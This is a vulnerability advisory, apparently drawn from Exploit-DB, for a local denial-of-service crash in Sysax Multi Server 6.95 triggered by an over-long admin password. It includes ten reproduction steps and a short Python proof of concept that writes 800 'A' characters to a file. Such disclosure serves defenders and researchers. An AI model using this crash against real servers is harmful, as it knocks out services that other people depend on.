Vendor: Sysax Multi Server
By: Luis Martinez
CVSS: 7.5 (HIGH)
Vulnerability Type: Denial of Service (DoS) Local
CWE: 400
Product Name: Sysax Multi Server
Affected Version From: 6.95
Affected Version To: 6.95
Patch Exists: NO
Related CWE:
CPE: sysax:multi_server:6.95
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64 es
2022

Sysax Multi Server 6.95 – ‘Password’ Denial of Service (PoC)

The vulnerability allows an attacker to cause a denial of service (DoS) condition in Sysax Multi Server version 6.95. When a long string is supplied as the password in the administrative settings (the PoC below uses 800 "A" characters), the application crashes, disrupting the availability of the server.

Mitigation:

Apply the latest patch or upgrade to a version that is not affected by this vulnerability. Restrict access to the server to trusted users only.

Exploit-DB raw data:

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Click "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed

#!/usr/bin/env python

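# Build the 800-character "A" string used as the over-long password value
buffer = "\x41" * 800
# Write it to a text file so it can be copied to the clipboard (step 2)
with open("Sysax_Multi_Server_6.95.txt", "w") as f:
    f.write(buffer)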